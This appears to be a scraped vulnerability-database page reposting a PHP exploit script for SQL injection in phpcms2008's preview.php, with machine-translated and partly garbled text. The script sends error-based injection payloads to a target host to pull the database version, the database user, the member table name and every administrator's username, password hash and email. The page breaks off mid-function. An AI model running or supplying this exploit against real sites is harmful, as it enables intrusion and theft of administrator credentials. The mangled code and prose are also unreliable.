phpcms2008 preview.php injection EXP-vulnerability warning-the black bar safety net

2013-12-16T00:00:00
ID MYHACK58:62201341467
Type myhack58
Reporter 佚名
Modified 2013-12-16T00:00:00

Description

phpcms2008 description

Phpcms2008 is a paragraph based on PHP+Mysql architecture of the web content management system, it is an open-source PHP development platform. Phpcms uses a modular approach to the development, functional and easy to use to facilitate the expansion, for medium to large sites provide heavyweight website Building Solutions. 3 years, by virtue of the Phpcms team long-term accumulation of extensive Web development and database experience and innovative pursuit of the perfect design concept that makes Phpcms got nearly 1 0 million site recognition, and are increasingly being applied to large and medium-sized business websites.

Recently help a friend website to do a test, found to be phpcms2008 the source code, The dark clouds search a little find preview. php existsSQL injectionvulnerabilities, just toss the exp out, and accelerate the injection speed.

This vulnerability of the detailed description can be found here, see the downstairs link:

http://www.wooyun.org/bugs/wooyun-2013-022112

phpcms2008 preview. php injection EXP

May use when you want to change the User-Agent, otherwise the injection is unsuccessful.

Before injection please register a user, the login cookie is written to a cookie variable.

<? php

/**

  • Created by waiting alone

  • Date: 13-11-24

  • Time: afternoon of 8:3 6

  • Name: phpcms2008_preview.php

  • Waiting alone blog: http://www.waitalone.cn/

*/

print_r('

+------------------------------------------------------+

PHPCMS2008 preview.php injection EXP

Site: http://www.waitalone.cn/

Trojan BY: the waiting alone

Time: 2013-11-24

+------------------------------------------------------+

');

if ($argc < 3) {

print_r('

+------------------------------------------------------+

Useage: php ' . $argv[0] . ' host path

Host: target server (ip/hostname)

Path: path of phpcms

Example: php ' . $argv[0] . ' localhost /phpcms

+------------------------------------------------------+

');

exit;

}

error_reporting(7);

//Statistics time

$start_time = func_time();

$host = $argv[1];

$path = $argv[2];

$cookie = "; //please put the affiliate cookie is written to this variable

if ($cookie == ") exit('please registered members after writing the cookie to the cookie variable.');

if (preg_match('/MySQL Query/i', send_pack("'"))) {

//Database version

$db_ver = "'and(select 1 from(select count(),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'database version:'. get_info($db_ver) . "\n";

//Database user

$db_user = "'and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'database user:'. get_info($db_user) . "\n";

//Get users table

$db_member = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema. the tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

$member = get_info($db_member);

//Get the admin number

$db_count = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,count(),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema. tables limit 0,1),floor(rand(0)*2))x from information_schema. tables group by x)a)#";

$ad_count = get_info($db_count);

echo 'the administrator table, a total of--[' . $ad_count . ']- An administrator' . "\n";

//Display injection data

foreach (range(0, ($ad_count - 1)) as $i) {

$ad_pass = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x3a,email,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'admin[' . ($i + 1) . ']- >' . get_info($ad_pass) . "\n";

}

} else {

exit("the report adults, the site does not exist for this vulnerability,you can continue to seconds next!\ n");

}

//Extract the return information

function get_info($info)

{

[1] [2] next